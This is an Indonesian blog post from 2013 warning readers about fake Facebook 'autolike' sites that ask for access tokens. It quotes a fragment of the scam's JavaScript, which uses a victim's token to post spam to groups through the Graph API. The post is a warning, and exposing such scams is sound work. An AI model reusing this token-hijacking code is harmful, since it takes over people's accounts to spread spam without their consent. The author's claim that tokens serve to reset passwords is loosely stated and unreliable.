Minggu, 03 Februari 2013

Hati-Hati Dengan Spam Bermodus Autolike

Posted by Erza Jullian 12.55, under , | No comments


Beberapa hari terakhir Grup Facebook SMAN 2 Bangkalan kebanjiran spam yang isinya tidak jelas. Ada yang promosi autolike, ada yang promosi video bok*p dan masih banyak lagi. Awalnya saya biasa saja toh itu bukan fb saya. Namun lama kelamaan nganggu juga....

Meskipun ada kata-kata yang berbeda, namun ada satu kesamaan yaitu update via Sony Xperia. Maka saya semakin yakin bahwa teman saya sudah tertipu dengan iming-iming autolike. Lalu saya menuju salah satu website yang dipromosikan tersebut. Situsnya memakai blogspot . Untuk menggunakan autolike tersebut ternyata kita membutuhkan akses token. Ini SSnya :




Anda harus memasukkan token !!!



Dan langsung saya ctrl+u untuk melihat kode-kode mencurigakan. WTF !!!!! Ini spam !!!! Intinya, saat kita memasukkan token facebook kita ke kotak tersebut, maka tanpa kita sadari akun kita akan membuat spam otomatis di setiap grup facebook yang diikuti.

Ini SSnya :




Kata-Kata Spam

Di tulisan yang saya blok tersebutlah letak spamnya. Ada tulisan begini :

  $.getJSON('https://graph.facebook.com/328290510514876/feed?method=post&message= Wow akhir ya saya bisa juga menggunakan auto like dan auto subscribe gampang kok tinggal klik [*http://Rialdiautolike-2.blogspot.com*] dijamin aman&set=a.310233775750685.72919.100002921947780&type=1<<<</&access_token='+ajAing.aksestoken,function(){});

        $.post('https://graph.facebook.com/268989016534354/comments', {

                access_token: ajAing.aksestoken,

                message: 'calisiyor'




 Jelas sekali kalo spam kan ? Kata-kata tersebut akan tertulis otomatis tanpa anda menyadarinya. Sangat bodoh sekali jika sobat tetap memakainya. :p



Jadi, saya harap jangan terlalu percaya dengan autolike. Apalagi yang menggunakan akses token. 99% autolike yang menggunakan token adalah spam ! Dan perlu diketahui, token sangat berguna untuk mereset password facebook sobat. Jadi bisa saja penipu berkedok autolike tersebut berniat jahat untuk mereset password facebook sobat. Sayang sekali kan kalo cuman mau make autolike sampai harus kehilangan akun facebook ? Saran saya, jika ingin menggunakan autolike, gunakan autolike yang tidak perlu memakai akses token !

0 komentar:

Posting Komentar

Blog Archive

Blog Archive